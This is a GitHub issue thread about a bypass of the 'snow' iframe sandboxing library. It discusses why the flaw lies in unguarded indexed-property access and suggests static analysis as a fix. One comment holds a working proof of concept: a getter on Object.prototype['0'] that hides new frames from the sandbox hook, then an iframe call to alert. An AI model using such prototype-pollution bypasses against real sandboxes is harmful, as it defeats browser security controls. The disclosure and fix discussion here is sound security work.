Comments (6)
Note that the prototype of an arguments object is just the primordial Object.prototype (cf. CreateUnmappedArgumentsObject and CreateMappedArgumentsObject).
from snow.
I think an important conclusion here is that, in contrast to the title of this issue, the exploit is not about the arguments object specifically, but about Snow not being careful when accessing indexed properties.
As proof, in the exploit PoC, arguments.__proto__ can be replaced with Object.prototype / Array.prototype and it'll still work.
from snow.
nice find @benjamingr
from snow.
Thanks, cool project! I warmly recommend figuring out how to run static analysis to find these (which would be a cool project on its own) :)
- For JavaScript I would pursue something similar to what @erights worked on here https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/37199.pdf
- For the DOM I'd pursue something similar autogenerated from the WebIDL of the spec so you can automatically keep up to date with the changing standard
Otherwise it's "whack a mole" with "did you find all the places JS is surprisingly dynamic in your code and all the places the DOM allows insertion".
from snow.
Conclusion: It's also doable in strict mode
(function() {
    "use strict";
    Object.defineProperty(Object.prototype, '0', {
        get() {
            const whereAmI = (new Error).stack;
            if (whereAmI.includes('hook')) {
                this.length = 0; // empty frames array
                return undefined;
            }
            return this.payload;
        },
        set(value) {
            // debugger;
            this.length = 1;
            this.payload = value;
        }
    });
})();
const fr = document.createElement('iframe');
document.body.appendChild(fr);
fr.contentWindow.alert.call(null, 'pwn');
from snow.
solution in progress
EDIT:
#15 is better
from snow.